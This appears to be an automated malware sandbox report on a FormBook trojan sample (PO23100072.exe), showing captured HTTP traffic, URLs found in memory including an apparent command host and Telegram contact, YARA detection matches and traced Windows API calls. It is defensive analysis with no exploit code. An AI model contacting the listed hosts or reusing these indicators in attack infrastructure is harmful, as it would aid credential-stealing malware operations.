70 2d 69 63 6f 6e 73 40 31 2e 34 2e 31 2f 66 6f 6e 74 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 25 Sep 2024 07:18:12 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66ea4ae9-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 25 Sep 2024 07:18:14 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66ea4ae9-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 25 Sep 2024 07:18:17 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66ea4ae9-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 25 Sep 2024 07:18:19 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66ea4ae9-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-encoding: gzipcontent-type: text/htmldate: Wed, 25 Sep 2024 07:18:40 GMTetag: W/"66d6a4ca-2b5"server: nginxvary: Accept-Encodingcontent-length: 454connection: closeData Raw: 1f 8b 08 00 00 00 00 00 04 03 75 92 bd 6e 14 31 10 c7 fb 7b 0a e3 2a 91 b2 e7 43 29 63 6f 03 d4 49 71 0d d5 c9 f1 4e 6e 1d bc de c5 9e bb 70 42 3c cc 29 bb 4f 40 91 e3 43 91 20 a2 40 48 50 82 28 a0 42 3c 00 05 2d f6 7a 57 80 10 6e ec d9 f9 cf 6f be 96 df ba 7b 7c 67 7e ff e4 1e 29 b1 32 f9 84 c7 8b 18 69 97 82 9e 4b 1a 3f 80 2c f2 09 21 1c 35 1a c8 db a7 ed fb ee f3 f6 65 b7 6b 3f bc de 3d ff da 5e b5 5f da 17 ed 0f ce 92 3f 2a 2b 40 19 78 d8 64 f0 70 a5 d7 82 aa da 22 58 cc 70 d3 00 25 83 25 28 c2 23 64 31 e1 11 51 a5 74 1e 50 c0 4a 65 e7 0d 25 ac 4f d9 83 ac ac 40 d0 b5 86 8b a6 76 f8 47 f8 85 2e b0 14 05 ac b5 82 ac 37 0e 88 b6 1a b5 34 99 57 d2 80 b8 3d 9d 85 16 42 45 46 db 07 c4 81 11 d4 e3 c6 80 2f 01 02 a9 74 70 26 28 53 de 33 70 ae 76 d3 f0 8a 2d b3 d4 33 3f ad 8b 4d 30 0b bd 26 ca 48 ef 05 0d 1d 45 61 82 ea 6a 49 bc 53 81 10 5e 89 30 70 1a bb a4 44 1a 14 34 94 fb 57 e4 62 a1 2b b9 84 04 f8 17 bc 58 54 e0 fd 28 08 85 37 b1 fc 78 fe 37 f7 ed 25 3f 75 a3 e8 70 f6 f6 66 f7 ad 7d d7 5d 75 df bb 9b ee e3 b0 a8 4f 6f ae 5f fd ec 17 f5 6c 7b d9 f3 38 1b c0 bf 13 f0 b0 b2 34 0f 9a cf 8f 4f 52 28 67 32 b1 87 00 ce 42 cd 71 42 e9 f2 ca e9 06 a3 22 ec 6e ae 2b a8 57 b8 47 1d 14 da 81 c2 bd 7d 7a 40 0e 67 e1 ec 1f 05 c9 d9 ca 2a d4 b5 0d 7b 18 fd 8f fb 62 4c ad 64 74 4c c7 fc 51 fd 24 24 19 f1 9c 0d 9b e8 7f 96 7c f2 0b 8a 6b eb d4 b5 02 00 00 Data Ascii: un1{*C)coIqNnpB<)O@C @HP(B<-zWno{|g~)2iK?,!5ek?=^_?*+@xdp"Xp%%(#d1QtPJe%O@vG.74W=BEF/tp&(S3pv-3?M0&HEajIS^0pD4Wb+XT(7x7%?upf}]uOo_l{84OR(g2BqB"n+WG}z@g*{bLdtLQ$$|k
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-encoding: gzipcontent-type: text/htmldate: Wed, 25 Sep 2024 07:18:43 GMTetag: W/"66d6a4ca-2b5"server: nginxvary: Accept-Encodingcontent-length: 454connection: closeData Raw: 1f 8b 08 00 00 00 00 00 04 03 75 92 bd 6e 14 31 10 c7 fb 7b 0a e3 2a 91 b2 e7 43 29 63 6f 03 d4 49 71 0d d5 c9 f1 4e 6e 1d bc de c5 9e bb 70 42 3c cc 29 bb 4f 40 91 e3 43 91 20 a2 40 48 50 82 28 a0 42 3c 00 05 2d f6 7a 57 80 10 6e ec d9 f9 cf 6f be 96 df ba 7b 7c 67 7e ff e4 1e 29 b1 32 f9 84 c7 8b 18 69 97 82 9e 4b 1a 3f 80 2c f2 09 21 1c 35 1a c8 db a7 ed fb ee f3 f6 65 b7 6b 3f bc de 3d ff da 5e b5 5f da 17 ed 0f ce 92 3f 2a 2b 40 19 78 d8 64 f0 70 a5 d7 82 aa da 22 58 cc 70 d3 00 25 83 25 28 c2 23 64 31 e1 11 51 a5 74 1e 50 c0 4a 65 e7 0d 25 ac 4f d9 83 ac ac 40 d0 b5 86 8b a6 76 f8 47 f8 85 2e b0 14 05 ac b5 82 ac 37 0e 88 b6 1a b5 34 99 57 d2 80 b8 3d 9d 85 16 42 45 46 db 07 c4 81 11 d4 e3 c6 80 2f 01 02 a9 74 70 26 28 53 de 33 70 ae 76 d3 f0 8a 2d b3 d4 33 3f ad 8b 4d 30 0b bd 26 ca 48 ef 05 0d 1d 45 61 82 ea 6a 49 bc 53 81 10 5e 89 30 70 1a bb a4 44 1a 14 34 94 fb 57 e4 62 a1 2b b9 84 04 f8 17 bc 58 54 e0 fd 28 08 85 37 b1 fc 78 fe 37 f7 ed 25 3f 75 a3 e8 70 f6 f6 66 f7 ad 7d d7 5d 75 df bb 9b ee e3 b0 a8 4f 6f ae 5f fd ec 17 f5 6c 7b d9 f3 38 1b c0 bf 13 f0 b0 b2 34 0f 9a cf 8f 4f 52 28 67 32 b1 87 00 ce 42 cd 71 42 e9 f2 ca e9 06 a3 22 ec 6e ae 2b a8 57 b8 47 1d 14 da 81 c2 bd 7d 7a 40 0e 67 e1 ec 1f 05 c9 d9 ca 2a d4 b5 0d 7b 18 fd 8f fb 62 4c ad 64 74 4c c7 fc 51 fd 24 24 19 f1 9c 0d 9b e8 7f 96 7c f2 0b 8a 6b eb d4 b5 02 00 00 Data Ascii: un1{*C)coIqNnpB<)O@C @HP(B<-zWno{|g~)2iK?,!5ek?=^_?*+@xdp"Xp%%(#d1QtPJe%O@vG.74W=BEF/tp&(S3pv-3?M0&HEajIS^0pD4Wb+XT(7x7%?upf}]uOo_l{84OR(g2BqB"n+WG}z@g*{bLdtLQ$$|k
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-encoding: gzipcontent-type: text/htmldate: Wed, 25 Sep 2024 07:18:45 GMTetag: W/"66d6a4ca-2b5"server: nginxvary: Accept-Encodingcontent-length: 454connection: closeData Raw: 1f 8b 08 00 00 00 00 00 04 03 75 92 bd 6e 14 31 10 c7 fb 7b 0a e3 2a 91 b2 e7 43 29 63 6f 03 d4 49 71 0d d5 c9 f1 4e 6e 1d bc de c5 9e bb 70 42 3c cc 29 bb 4f 40 91 e3 43 91 20 a2 40 48 50 82 28 a0 42 3c 00 05 2d f6 7a 57 80 10 6e ec d9 f9 cf 6f be 96 df ba 7b 7c 67 7e ff e4 1e 29 b1 32 f9 84 c7 8b 18 69 97 82 9e 4b 1a 3f 80 2c f2 09 21 1c 35 1a c8 db a7 ed fb ee f3 f6 65 b7 6b 3f bc de 3d ff da 5e b5 5f da 17 ed 0f ce 92 3f 2a 2b 40 19 78 d8 64 f0 70 a5 d7 82 aa da 22 58 cc 70 d3 00 25 83 25 28 c2 23 64 31 e1 11 51 a5 74 1e 50 c0 4a 65 e7 0d 25 ac 4f d9 83 ac ac 40 d0 b5 86 8b a6 76 f8 47 f8 85 2e b0 14 05 ac b5 82 ac 37 0e 88 b6 1a b5 34 99 57 d2 80 b8 3d 9d 85 16 42 45 46 db 07 c4 81 11 d4 e3 c6 80 2f 01 02 a9 74 70 26 28 53 de 33 70 ae 76 d3 f0 8a 2d b3 d4 33 3f ad 8b 4d 30 0b bd 26 ca 48 ef 05 0d 1d 45 61 82 ea 6a 49 bc 53 81 10 5e 89 30 70 1a bb a4 44 1a 14 34 94 fb 57 e4 62 a1 2b b9 84 04 f8 17 bc 58 54 e0 fd 28 08 85 37 b1 fc 78 fe 37 f7 ed 25 3f 75 a3 e8 70 f6 f6 66 f7 ad 7d d7 5d 75 df bb 9b ee e3 b0 a8 4f 6f ae 5f fd ec 17 f5 6c 7b d9 f3 38 1b c0 bf 13 f0 b0 b2 34 0f 9a cf 8f 4f 52 28 67 32 b1 87 00 ce 42 cd 71 42 e9 f2 ca e9 06 a3 22 ec 6e ae 2b a8 57 b8 47 1d 14 da 81 c2 bd 7d 7a 40 0e 67 e1 ec 1f 05 c9 d9 ca 2a d4 b5 0d 7b 18 fd 8f fb 62 4c ad 64 74 4c c7 fc 51 fd 24 24 19 f1 9c 0d 9b e8 7f 96 7c f2 0b 8a 6b eb d4 b5 02 00 00 Data Ascii: un1{*C)coIqNnpB<)O@C @HP(B<-zWno{|g~)2iK?,!5ek?=^_?*+@xdp"Xp%%(#d1QtPJe%O@vG.74W=BEF/tp&(S3pv-3?M0&HEajIS^0pD4Wb+XT(7x7%?upf}]uOo_l{84OR(g2BqB"n+WG}z@g*{bLdtLQ$$|k
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/htmldate: Wed, 25 Sep 2024 07:18:48 GMTetag: W/"66d6a4ca-2b5"server: nginxvary: Accept-Encodingcontent-length: 693connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e a4 b3 a4 ce a5 da a1 bc a5 b8 a4 cf c2 b8 ba df a4 b7 a4 de a4 bb a4 f3 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 65 75 63 2d 6a 70 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 65 72 72 6f 72 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 2d 65 72 72 6f 72 22 3e 0a 20 20 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 67 2f 65 72 72 6f 72 2f 65 72 72 6f 72 2e 70 6e 67 22 20 61 6c 74 3d 22 22 20 63 6c 61 73 73 3d 22 70 2d 65 72 72 6f 72 5f 5f 69 6d 61 67 65 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 2d 65 72 72 6f 72 5f 5f 6d 65 73 73 61 67 65 22 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 a4 b3 a4 ce a5 da a1 bc a5 b8 a4 cf c2 b8 ba df a4 b7 a4 de a4 bb a4 f3 a1 a3 3c 62 72 3e 0a 20 20 20 20 20 20 33 30 c9 c3 b8 e5 a4 cb a5 b7 a5 e7 a5 c3 a5 d7 a5 da a1 bc a5 b8 a4 d8 c5 be c1 f7 a4 b7 a4 de a4 b9 a1 a3 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 54 4f 50 a5 da a1 bc a5 b8 3c 2f 61 3e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 73 65 74 54 69 6d 65 6f 75 74 28 22 72 65 64 69 72 65 63 74 28 29 22 2c 20 33 30 30 30 30 29 3b 0a 20 20 66 75 6e 63 74 69 6f 6e 20 72 65 64 69 72 65 63 74 28 29 7b 0a 20 20 20 20 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 22 3b 0a 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="ja"><head> <title></title> <meta http-equiv="content-type" content="text/html; charset=euc-jp" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="stylesheet" href="/css/error.css"></head><body><div class="p-error"> <img src="/img/error/error.png" alt="" class="p-error__image"> <div class="p-error__message"> <p> <br> 30 </p> <p> <a href="/">TOP</a> </p> </div></div><script> setTimeout("redirect()", 30000); function redirect(){ location.href="/"; }</script></body></html>
            Source: userinit.exe, 00000009.00000002.3907399818.0000000004346000.00000004.10000000.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 0000000A.00000002.3907152374.00000000035E6000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.2014187374.0000000020AD6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: http://156.226.108.98:58888/
            Source: PO23100072.exe, 00000000.00000002.1480577595.0000000002B55000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: FrMKpuEiehQ.exe, 0000000A.00000002.3909668348.00000000054F5000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.agilizeimob.app
            Source: FrMKpuEiehQ.exe, 0000000A.00000002.3909668348.00000000054F5000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.agilizeimob.app/we8s/
            Source: userinit.exe, 00000009.00000002.3907399818.000000000498E000.00000004.10000000.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 0000000A.00000002.3907152374.0000000003C2E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.litespeedtech.com/error-page
            Source: userinit.exe, 00000009.00000002.3907399818.000000000548C000.00000004.10000000.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 0000000A.00000002.3907152374.000000000472C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://6329.vhjhbv.com/ujoo/?Ux_TPFo=kGHyISKf2PELDNGAt7xcpe4yC
            Source: userinit.exe, 00000009.00000002.3910035352.0000000008058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: userinit.exe, 00000009.00000002.3910035352.0000000008058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: userinit.exe, 00000009.00000002.3907399818.0000000004B20000.00000004.10000000.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 0000000A.00000002.3907152374.0000000003DC0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap
            Source: userinit.exe, 00000009.00000002.3907399818.0000000004B20000.00000004.10000000.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 0000000A.00000002.3907152374.0000000003DC0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap-icons
            Source: userinit.exe, 00000009.00000002.3907399818.0000000004B20000.00000004.10000000.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 0000000A.00000002.3907152374.0000000003DC0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css
            Source: userinit.exe, 00000009.00000002.3910035352.0000000008058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: userinit.exe, 00000009.00000002.3910035352.0000000008058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: userinit.exe, 00000009.00000002.3907399818.0000000004B20000.00000004.10000000.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 0000000A.00000002.3907152374.0000000003DC0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://code.jquery.com/jquery-3.4.1.min.js
            Source: userinit.exe, 00000009.00000002.3910035352.0000000008058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: userinit.exe, 00000009.00000002.3910035352.0000000008058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: userinit.exe, 00000009.00000002.3910035352.0000000008058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: userinit.exe, 00000009.00000002.3907399818.0000000004B20000.00000004.10000000.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 0000000A.00000002.3907152374.0000000003DC0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
            Source: userinit.exe, 00000009.00000002.3907399818.0000000004B20000.00000004.10000000.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 0000000A.00000002.3907152374.0000000003DC0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css2?family=Heebo:wght
            Source: userinit.exe, 00000009.00000002.3907399818.0000000004B20000.00000004.10000000.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 0000000A.00000002.3907152374.0000000003DC0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com
            Source: userinit.exe, 00000009.00000002.3907399818.0000000004B20000.00000004.10000000.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 0000000A.00000002.3907152374.0000000003DC0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://htmlcodex.com
            Source: userinit.exe, 00000009.00000002.3907399818.0000000004B20000.00000004.10000000.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 0000000A.00000002.3907152374.0000000003DC0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://htmlcodex.com/credit-removal
            Source: userinit.exe, 00000009.00000002.3905231115.0000000003123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: userinit.exe, 00000009.00000002.3905231115.0000000003123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: userinit.exe, 00000009.00000003.1904708473.0000000007F8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: userinit.exe, 00000009.00000002.3905231115.0000000003123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: userinit.exe, 00000009.00000002.3905231115.0000000003123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033~
            Source: userinit.exe, 00000009.00000002.3905231115.0000000003123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: userinit.exe, 00000009.00000002.3905231115.0000000003123000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: userinit.exe, 00000009.00000002.3907399818.0000000004346000.00000004.10000000.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 0000000A.00000002.3907152374.00000000035E6000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.2014187374.0000000020AD6000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://t.me/AG09999
            Source: userinit.exe, 00000009.00000002.3910035352.0000000008058000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: userinit.exe, 00000009.00000002.3907399818.0000000004CB2000.00000004.10000000.00040000.00000000.sdmp, userinit.exe, 00000009.00000002.3907399818.00000000044D8000.00000004.10000000.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 0000000A.00000002.3907152374.0000000003778000.00000004.00000001.00040000.00000000.sdmp, FrMKpuEiehQ.exe, 0000000A.00000002.3907152374.0000000003F52000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 5.2.PO23100072.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.PO23100072.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.1660826698.00000000016C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3906438503.0000000003600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1660331680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.3909668348.00000000054A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3906350104.0000000003560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1665615488.00000000030B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3906324817.0000000004410000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 5.2.PO23100072.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.2.PO23100072.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.1660826698.00000000016C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.3906438503.0000000003600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.3904838234.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.1660331680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000A.00000002.3909668348.00000000054A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.3906350104.0000000003560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.1665615488.00000000030B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3906324817.0000000004410000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_0042C283 NtClose,5_2_0042C283
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2B60 NtClose,LdrInitializeThunk,5_2_017E2B60
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_017E2DF0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_017E2C70
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E35C0 NtCreateMutant,LdrInitializeThunk,5_2_017E35C0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E4340 NtSetContextThread,5_2_017E4340
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E4650 NtSuspendThread,5_2_017E4650
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2BF0 NtAllocateVirtualMemory,5_2_017E2BF0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2BE0 NtQueryValueKey,5_2_017E2BE0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2BA0 NtEnumerateValueKey,5_2_017E2BA0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2B80 NtQueryInformationFile,5_2_017E2B80
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2AF0 NtWriteFile,5_2_017E2AF0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2AD0 NtReadFile,5_2_017E2AD0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2AB0 NtWaitForSingleObject,5_2_017E2AB0
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2D30 NtUnmapViewOfSection,5_2_017E2D30
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2D10 NtMapViewOfSection,5_2_017E2D10
            Source: C:\Users\user\Desktop\PO23100072.exeCode function: 5_2_017E2D00 NtSetInformationFile,5_2_017E2D00
